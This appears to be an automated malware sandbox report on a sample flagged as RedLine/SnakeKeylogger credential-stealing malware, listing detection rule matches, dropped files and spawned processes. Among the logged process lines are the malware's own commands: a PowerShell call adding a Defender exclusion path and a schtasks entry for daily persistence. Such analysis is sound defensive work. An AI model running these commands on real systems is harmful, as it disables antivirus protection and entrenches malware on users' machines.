                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00408C601_2_00408C60
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_0040DC111_2_0040DC11
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00407C3F1_2_00407C3F
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00418CCC1_2_00418CCC
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00406CA01_2_00406CA0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004028B01_2_004028B0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_0041A4BE1_2_0041A4BE
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004182441_2_00418244
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004016501_2_00401650
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00402F201_2_00402F20
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004193C41_2_004193C4
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004187881_2_00418788
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00402F891_2_00402F89
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_00402B901_2_00402B90
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004073A01_2_004073A0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_021810301_2_02181030
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_021810201_2_02181020
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 3_2_00C2C5303_2_00C2C530
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 3_2_00C294803_2_00C29480
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 3_2_00C2C5213_2_00C2C521
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 3_2_00C2946F3_2_00C2946F
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 3_2_00C2DFD13_2_00C2DFD1
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 3_2_00C2DFB13_2_00C2DFB1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_041FB4904_2_041FB490
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_041FB4704_2_041FB470
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DBDAAC11_2_04DBDAAC
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DB1B9411_2_04DB1B94
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DB25B811_2_04DB25B8
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DB25A811_2_04DB25A8
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DB255F11_2_04DB255F
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DB256311_2_04DB2563
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DBE62111_2_04DBE621
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DB417411_2_04DB4174
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DB1D2011_2_04DB1D20
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_04DB1B8811_2_04DB1B88
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_05BE336011_2_05BE3360
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\server01.exe 7F73743991E06E23B0A1FEC66A8FA5F194D49FBE15C58473D10798758C856D31
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: String function: 0040E1D8 appears 44 times
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245104085.00000000034F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNova-BTC.exe4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245104085.00000000034F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000003.2221472933.0000000000636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNova-BTC.e vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245341110.0000000004AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNova-BTC.exe4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245341110.0000000004AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000003.2218776122.0000000000653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2244099849.0000000002214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNova-BTC.exe4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2244099849.0000000002214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2244331248.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2244331248.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2244331248.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2244331248.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe* vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000003.2228551459.0000000000625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000003.2221472933.00000000005E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNova-BTC.exe4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000003.2221472933.00000000005E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245631475.000000000571C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe* vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2245462797.0000000005110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNova-BTC.exe4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNova-BTC.exe4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exe, 00000001.00000003.2218871674.0000000000659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exeBinary or memory string: OriginalFilenameNova-BTC.exe4 vs F7Xu8bRnXT.exe
                              Source: F7Xu8bRnXT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: F7Xu8bRnXT.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                              Source: 1.2.F7Xu8bRnXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 1.0.F7Xu8bRnXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                              Source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                              Source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                              Source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: Process Memory Space: F7Xu8bRnXT.exe PID: 7092, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: Process Memory Space: server01.exe PID: 2200, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                              Source: F7Xu8bRnXT.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9951311383928572
                              Source: server01.exe.1.dr, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                              Source: server01.exe.1.dr, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 1.2.F7Xu8bRnXT.exe.34f6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.F7Xu8bRnXT.exe.34f6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.F7Xu8bRnXT.exe.34f6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.F7Xu8bRnXT.exe.3534590.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.F7Xu8bRnXT.exe.3534590.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.F7Xu8bRnXT.exe.3534590.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/10@2/2
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F7Xu8bRnXT.exe.logJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_03
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCommand line argument: 08A1_2_00413780
                              Source: F7Xu8bRnXT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: server01.exe, 00000003.00000002.3497845086.000000000381D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000002.3486443994.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000002.3486443994.000000000290D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000002.3486443994.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000002.3486443994.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000002.3486443994.0000000002900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: F7Xu8bRnXT.exeReversingLabs: Detection: 39%
                              Source: unknownProcess created: C:\Users\user\Desktop\F7Xu8bRnXT.exe "C:\Users\user\Desktop\F7Xu8bRnXT.exe"
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe"
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /fJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: version.dllJump to behavior
